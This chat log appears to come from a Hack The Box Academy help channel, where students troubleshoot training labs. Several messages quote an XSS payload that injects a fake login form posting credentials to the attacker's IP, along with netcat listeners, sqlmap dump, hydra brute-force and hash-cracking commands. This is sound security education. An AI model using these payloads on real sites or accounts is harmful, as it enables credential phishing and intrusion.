Is it saying I need to enumerate the system to find information on those vhosts?

#

Or is it saying I need to modify my /etc/hosts to link the spawned system IP to the two vhosts?

astral inlet
#

maybe you need a nameserver and "dig" it ?

#

or fuzz it

fathom pendant
minor stag
#

I could fuzz it, but fuzzing isn't taught in this module

minor stag
fathom pendant
#

That's what they're called

minor stag
#

Good info for future modules

fathom pendant
#

Virtual Hosts

#

vHosts

glossy flame
#

hello, I am quite lost on the "Suricata Rule Development Part 2 (Encrypted Traffic)" Module, the question:

There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer.

so I did just like the example, first calculate the ja3 hash of the trickbot.pcap
than I run suricata but the fast.log is returning empty.

I also get an error when running suricata after uncommenting the rule with the sid 100299

glossy flame
rotund steppe
#

Working on the medium footprinting lab https://academy.hackthebox.com/module/112/section/1079; can't access the nfs share after it's mounted. ran
sudo mkdir target-NFS | sudo mount -t nfs <targetip>:/ ./target-NFS/ -o nolock
and it mounts the drive as this:
drwx------ 2 nobody nogroup 65536 Nov 10 2021 target-NFS
Can't cd to TechSupport from within target-NFS, get permission denied.
Tried chmod and chown to change permissions, didn't work.
When I unmount the share, the folder goes back to root ownership:
drwxr-xr-x 2 root root 4096 Mar 1 08:46 target-NFS
Also tried this:
sudo mount -t nfs <targetip>:/TechSupport ./target-NFS -o rw,nolock
and that didn't work either.
still get this: ┌──(kali㉿kali)-[~/target-NFS] └─$ cd TechSupport cd: permission denied: TechSupport
Same thing happening in PwnBox with all of the above commands.

stark vortex
rotund steppe
#

Ran mkdir and mount as sudo??

#
sudo: cd: command not found
sudo: "cd" is a shell built-in command, it cannot be run directly.
sudo: the -s option may be used to run a privileged shell.
sudo: the -D option may be used to run a command in a specific directory.```
#

did sudo chmod and sudo chown too, still got permission denied.

#
sudo: you are not permitted to use the -D option with TechSupport```
stark vortex
#

maybe use root directly and not sudo

rotund steppe
#

Okay that worked

#

But that is silly, and dangerous.

#

Oh well, thanks @stark vortex

stark vortex
#

no problem

acoustic owl
# rotund steppe But that is silly, and dangerous.

But that's exactly the point.
The share can be accessed with root. The server only checks whether the UserID is correct. Whether this is root from the server or another PC is irrelevant.
That's why you have access.

rotund steppe
#

Ahhhhh, gotcha.

astral inlet
astral inlet
#

no names 🙂

#

please cover hints

stark vortex
#

my bad I messed up the writing

#

oh its || not |

astral inlet
#

you can just mark the text and then do "the eye"

stark vortex
#

anyway I think I'm just gonna try some other things

astral inlet
#

try some tools you learned to get creds 😉

fresh bramble
#

Attacking Common Applications - Skills Assessment II - First time post –
I only have one question to answer- Obtain reverse shell access on the target and submit the contents of the flag.txt file.
I am having difficulty with establishing the reverse shell.
I am using the methodology as described on page 18, attacking gitlab.
Where I am stuck – the changes needed to the command to get the reverse shell to work.
I have been working through the github documentation on the script (different script based on the version in use on this box) and I am stuck. I do have a reverse shell but it is to my attack box – much like a closed loop and not a RCE.
Don’t want to throw out any spoilers – but if you have gotten through this - I would appreciate some hints on getting this command right to get the RCE up and running.
Obviously my next quest will be on finding the path – still to come!! - UPDATE - I got the flag! I was barking up the wrong tree - There is a 3rd VHost - I had used Metasploit on this host - there are some vulnerabilities but I just couldn't get them to work! So - I went back and used this same methodology as with Gitlab RCE - Lo and Behold - it worked like a charm - just as slick as it worked on the older version of Gitlab! - and the path to the flag was a breeze!! - On to the next module - I am at 83% and counting!

tight spoke
#

I have a noob question, I am having difficulty connecting to the VPN

compact patrolBOT
tight spoke
#

I found the parrot box didn't have all the tools I needed to I opted for using my own Kali but the VPN isn't connecting.

acoustic owl
#

Take another look at the first sections in the module.

tight spoke
#

also is the time spent on the VPN limited like it is on the PWNBox?

acoustic owl
tight spoke
acoustic owl
#

No, the use of your VM is not restricted

#

I recommend TCP

tight spoke
#

yeah that makes sense, I have my own Klai VM on VMWare Workstation set to NAT

#

I'll try TCP

#

the VPN also says it's offline, how do I start it?

acoustic owl
tight spoke
#

I just got in

#

Thanks!

acoustic owl
tight spoke
#

I did that and it worked, I guess I needed to use TCP. How long can I be on here with the free version?

iron sigil
#

Hello everyone, i am currently stuck on the 2nd part of this section https://academy.hackthebox.com/module/77/section/844 , i had to connect to the target using ssh as user1 and then move to user2 to get the first flag.txt which i succeeded in. the second part was to escalate user2's priveleges to root. i am stuck here because i am unable to find the password for user2 and also for the root . the hint says to use chmod but i am denied permissions. can you please point me in the right direction

#

been stuck on this since yesterday

acoustic owl
tight spoke
#

sweet

#

I'm in the starting level called "Dancing" and the nmap tool won't scan the ports. This is a fresh image with recent patches so there shouldn't be a lot of issues with it just yet

old vector
#

im stuck in academy on file transfers. it says Pwnbox Check SSH Key MD5 Hash. shows mate "md5sum id_rsa" i know where the actually key is in linux but why doesnt this command work like the screen shows? any quick explanations what im doing wrong.

next bronze
#

wdym the command doesn't work? you're getting a different hash?

old vector
next bronze
#

well you need to have the id_rsa file before you can run the md5 hash on it

old vector
#

i wish some of the modules were a little bit easier to follow

#

this was the beginning of this lesson

next bronze
#

have you done the linux fundamental module?

dim wolf
#

i simply cannot wait to learn about assembly and malware analysis

#

both happy and sad tears will be shed

brazen peak
#

hi please can u help me i have some problem in hackthebox
and i cant send img

high reef
#

Hi everyone i'm doing the web attacks modules and i'm stuck on the first task

#

i used PUT,GET,POST i get the blank page but how do i get the flag ?

acoustic owl
fresh bramble
#

You should be in Burp - my notes show that I too was going batty figuring out the token - I went back to the IDOR chaining module - followed that real close! - Once you are in you need to focus on the event and file disclosure - best wishes -

high reef
#

and when i go back to the file managher page i still seee the notes.txt ? any help

#

blank page

bright rune
hot heart
#

CROSS-SITE scripting (XSS): Phishing section:
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

I've ran this to no avail, there is still exposed HTML after my injection.

sudo nc -lvnp 80 doesn't work either, 80 is being used by the pwnbox and will terminate my pwnbox when I kill the task

#

I have not once been able to capture the credentials successfully even after pursuing with discrepancies

I went ahead and revealed the payload with XSStrike, configured it properly to the original payload, have tried sending it to the send.php subdirectory that HTB instructs with net cat open and nothing is working

I've even tried with a php listening server and it returns the same error nc does, I've tried using different ports as well, everything to no avail

fresh bramble
#

great to be Amor!

quick crane
#

can I dm you

#

can I dm you?

stark vortex
quick crane
#

can I dm you?

#

can I dm you?

hot heart
#

Mods, incinerate this mans entire bloodline, EXPEDITE^^

sterile epoch
#

I am stuck in sqlmap essentials. I am in the attack tuning section
for the first task I used the command
sqlmap -u 'http://94.237.49.138:56473/case5.php?id=1' --level 5 --risk 3 -T flag5 --no-cast --dump --batch
and got the table

+----+---------+
| id | cpytent |
+----+---------+
| 1  |         |
+----+---------+

I then tried to capture the original request through burp and saved it to file

GET /case5.php?id=1 HTTP/1.1
Host: 94.237.56.188:32260
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.56.188:32260/case5.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

Then I used sqlmap -r req.txt --no-cast -T flag5 --batch --dump --level 5 --risk 3

Database: testdb
Table: flag5
[1 entry]
+----+-----------+
| id | conten   |
+----+-----------+
| 1  |           |
+----+-----------+
#

I tried to change the level from 2,3,4,5 but did not get any flag. the task instructed to submit the contents of the table but no value is working

frozen stone
#

Hey everyone, I'm having trouble solving the HTTP misconfiguration Hard assessment. If anyone can help me out, please let me know. Thanks.

hot heart
#

CROSS-SITE scripting (XSS): Phishing section:
document.write('<h3>Please login to continue</h3><form action=http://our_ip%3E/<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

I've ran this to no avail, there is still exposed HTML after my injection.

sudo nc -lvnp 80 doesn't work either, 80 is being used by the pwnbox and will terminate my pwnbox when I kill the task (edited)
[11:21 AM]
I have not once been able to capture the credentials successfully even after pursuing with discrepancies

I went ahead and revealed the payload with XSStrike, configured it properly to the original payload, have tried sending it to the send.php subdirectory that HTB instructs with net cat open and nothing is working

I've even tried with a php listening server and it returns the same error nc does, I've tried using different ports as well, everything to no avail

tight spoke
#

Are you using Kali or something else?

acoustic owl
acoustic owl
hot heart
#

I’ve tried doing both

raven lagoon
#

Hello guys im doing Active Directory Enumeration & Attacks module

Ive tried to restart 3 times the lab but RDP shows me that

slate carbon
tranquil axle
raven lagoon
#

ive tried

slate carbon
# raven lagoon nothing happened

If you have a windows machine you can try using socat to forward the rdp port and use the windows rdp application to see if you can interact.

#

Or just use the vpn on the windows machine instead of going through socat

raven lagoon
#

do you think its a xfreerdp issue?

slate carbon
#

I remember one of the labs having a black screen but I don't remember what I did. Most likely hit enter or space

cursive oriole
#

Hello, I'm currently engaged in a Password Attacks - Medium skill assessment. Previously, I managed to access the d********.docx file by using LibreOffice and the correct password that I had identified earlier. However, I'm facing some issues with installing LibreOffice on my PWN box today as I am retrying yesterdays assesment and i didn't take note of the passwords. Is there an alternative method to view the .docx file without relying on LibreOffice?

raven lagoon
cursive oriole
#

Okay thanx a lot! I'll try it out!

raven lagoon
#

dont you see weird stuff using cat in libreoffice files?

slate carbon
#

My mind is waking up still. The file is password protected so the easiest solution would be a document viewer

slate carbon
#

You could try using something lik 7zip to extract the docx file.
The plaintext will be in word/document.xml

#

I think with 7z it will allow you to pass a password

timid steeple
#

Hoping someone can pelase help, in Password Attacks - Hard, i used bitlocker2john on the .vhd followed by hashcat which provided a password. I couldn't get it the.vhd to mount in kali so after trying for ages I moved it to windows where it mounts and asks for a password which seemed like progress however when I try to us the password 1********! it tells me it's incorrect. Any guidance massively appreciated as I've come to a complete standstill here.

tranquil axle
timid steeple
#

kept getting a load of errors using that one, if it's moutning on windows and asking for a password its not the mount thats the issue but the password surely? Being with 1 and ends with !

#

Begins with*

topaz badger
# high reef blank page

Hi Bro, I used PUT method on /admin/reset.php then visited the main page and i was able to see the flag

tranquil gull
#

Hey is anyone able to assist on the AD capstone? Im following all the steps but Kerberoasting the SQL user is not working

misty cedar
#

So need a little bit of help:
On Information Gathering - Web Edition; Active Infrastructure Identification and I just put the target IP for both vHosts. when doing
whatweb -a 4 http://<target>/ -v

Not me freaking writing this then it wants to work...

#

I'm not even joking, as Im tryping this, I got my output

upper ruin
#

Hello kind people, I am at Port forwarding skills assessment, done everything as it's supposed to be up until now:

#

Anyone got an idea on what I should do?

#

Thx in adcance.

upper ruin
#

I just transferred it on the windows host.

next bronze
#

use x64

#

64 bit program for 64 bit system

upper ruin
#

Will do, is it in some old folder?

#

On gh?

#

Should be.

#

Anyways, ty kind people.

next bronze
#

one folder up from where you got the x86 version

tight spoke
#

I'm on crafty and there is a port 80 open, what are the options here?

stark vortex
#

go to #boxes the question is better suited there, if you cannot see it read and follow #welcome and verify your account

tight spoke
#

it says No Access

#

do I need roles?

stark vortex
tight spoke
#

got it, thanks

upper ruin
#

Got em hashes, ty all.

light otter
#

Hey Everyone ,
currently going through the Finding evil module.

i've updated the .xml file within the Sysmon directory , and able to filter with the keyword relating to the event type to detect DLL hijjack .
However when i do a find + calc.exe i'm not seeing anything to see the SHA256 hash , been stuck here for an hour.
any suggestions?

#

wait i thought it was in the cdsa section lol let me post this there

fathom pendant
misty cedar
#

In the modules but just wanted a TINY bit of clarification... a Zone is it's own seperate entity that is managed under a main domain correct?

native turtle
#

super slow on Europe 1

native turtle
#

every day I switch region at least 2 times...

acoustic owl
misty cedar
#

I guess identifying it is more the confusing part

junior oxide
#

in the credentials hunting in linux section under password attacks i've tried this command to brute force for kira but got nothing "hydra -l kira -P mut_password.list ftp://IP -t 64" and got nothing also here is the command i used to mut the password list i had from resources section " hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list" am i doing anything wrong ?

misty cedar
rapid hollow
#

Hello, does anyone face the issue "You must stop your active machine before spawning another one"?? In starting section

acoustic owl
misty cedar
acoustic owl
#

Not mandatory.
A subdomain can also describe a server. Then it is not a zone. A zone contains further sub-elements

misty cedar
#

that just makes more questions than answers

misty cedar
#

New question, so when finding A records, I'm only seeing the sname number for both zones. And looking back at the dig/nslook up section i have copied down, I see no other option...

fathom pendant
#

Add numbers together for all zones you find

#

If there's n records on one and z records on the other, add

buoyant void
split summit
#

I need a help :

Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

http://94.237.54.48:43342

soft cedar
misty cedar
fathom pendant
#

Count the A records

#

That's really all I can say regarding it

split summit
fathom pendant
#

The flag in most cases {with htb} generally means a string of text HTB{..} though not always

raven lagoon
#

💀

fathom pendant
#

A flag is just a goal/checkpoint that proves you did the thing

split summit
#

What will I write in response?

fathom pendant
#

Whatever the answer is

split summit
#

What do I need to find? Overall, I don't understand the command

fathom pendant
#

You need to find the flag

#

Everything you need to complete this is in the section

soft cedar
soft cedar
sterile epoch
buoyant void
#

Yeah I think something was just a bit wonky for that target

hot heart
#

CROSS-SITE scripting (XSS): Phishing section:
document.write('<h3>Please login to continue</h3><form action=http://our_ip%3E/<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

I've ran this to no avail, there is still exposed HTML after my injection.

sudo nc -lvnp 80 doesn't work either, 80 is being used by the pwnbox and will terminate my pwnbox when I kill the task (edited)
[11:21 AM]
I have not once been able to capture the credentials successfully even after pursuing with discrepancies

I went ahead and revealed the payload with XSStrike, configured it properly to the original payload, have tried sending it to the send.php subdirectory that HTB instructs with net cat open and nothing is working

I've even tried with a php listening server and it returns the same error nc does, I've tried using different ports as well, everything to no avail. I’ve tried different port numbers, and yes I’ve closed all tags

next bronze
#

look at the page source, close the tags that's left over

acoustic owl
#

Because the PwnBox uses port 80

acoustic owl
hot heart
#

But I've done these things

acoustic owl
#

Why do you still have open HTML tags if you have closed them?

#

And why do you still have problems with port 80 if you no longer use it? I'm a little confused

hot heart
#

This isn't right?
||‘><script>document.write(‘<h3>Please login to continue</h3><form action=http://10.10.14.117/><input type=”username” name=”username” placeholder=”Username”><input type=”password” name=”password” placeholder=”Password”><input type=”submit” name=”submit” value=”Login”></form>’);document.getElementById(‘urlform’).remove();</script><!--||

#

I thought that's what <!-- was for?

#

I don't have problems with port 80, I haven't used port 80 again I was just restating my issue from earlier

#

I can't get ANY port to work, idk why

fathom pendant
hot heart
#

Whenever I configure a PHP listener or nc listener on any port they just listen... nothing else 😂😂

fathom pendant
#

You'd need to specify your http listener port

hot heart
#

inside the SERVER_IP right?

#

10.10.14.117:any_port_I_use?

#

I've done that too still nothing

acoustic owl
#

I summarize

You say your listener is not running on port 80
But your payload uses port 80
You say you are not using port 80

How exactly are we supposed to help you if your statements and your commands/payloads don't match?

hot heart
#

sorry, I see how that's confusing

#

ok lets start over: I know not to use port 80

acoustic owl
hot heart
#

Yea that I understand already, but my issue is no matter what port I use for the listener and my payload I still cannot yield any results

fathom pendant
#

You need to specify whatever port your listener is on

hot heart
#

Lets just say 8080

fathom pendant
#

I'd say test your payload

acoustic owl
fathom pendant
#

I believe there's a test page

#

That you can check with

acoustic owl
#

You must ensure that your port is not used for any other purpose

hot heart
#

Let me run through again and I'll send screenshots

#

gotcha^

next bronze
astral inlet
#

||')><||

hot heart
#

||document.write(‘<h3>Please login to continue</h3><form action=http://10.10.14.81/><input type=”username” name=”username” placeholder=”Username”><input type=”password” name=”password” placeholder=”Password”><input type=”submit” name=”submit” value=”Login”></form>’);document.getElementById(‘urlform’).remove();||

I just injected this into TARGET_IP/phishing and it yielded the malicious login form

acoustic owl
#

And used port 80 again

hot heart
#

After trying to comment out the visible HTML with <!

acoustic owl
#

It can‘t work

hot heart
#

I see what your saying

#

wait never mind

#

I get unable to connect

#

I forgot I tried that as well

#

Also commenting out the remainig HTML with <!-- is still not working for me

acoustic owl
#

Do you have to comment out the rest of the HTML file?
I mean, you will still need the closing </html> tag, right?

#

And probably a lot of other HTML code too

hot heart
#

I guess the problem was copying it and pasting it from my notepad wasn't allowed? Cuz I did everything that I did over a thousand times yesterday, the only thing I did different was not copy and paste it from the htb pwnbox.....

#

Dam @acoustic owl You have 3 certs?!

#

How do you feel about CWEE? Have you started yet?

acoustic owl
#

that's my next goal. But I still have a lot to learn

hot heart
#

Didn't it just come out like a week ago? Who would you go to if you ever got stumped?

#

Dude your cracked. I'm not even glazing thats crazy you have all three

astral inlet
#

maybe he started earlier 😉

hot heart
#

True. But still we gotta give credit where credit is due

acoustic owl
acoustic owl
hot heart
#

Haha man's is being humble, I respect it. Do you have a time frame for your CWEE? Or r u just gonna go at your own pace

acoustic owl
#

That's the good thing about doing it as a hobby. Nobody expects anything. Nobody expects me to have done anything by x date.

#

But the certificate looks really cool. I want to have it

hot heart
#

Tell me about it, they snapped on the logo design for no reason. They had no business making it so tough 😭😭

#

In all honesty I just want my CBBH icon next to my name like @next bronze has his CPTS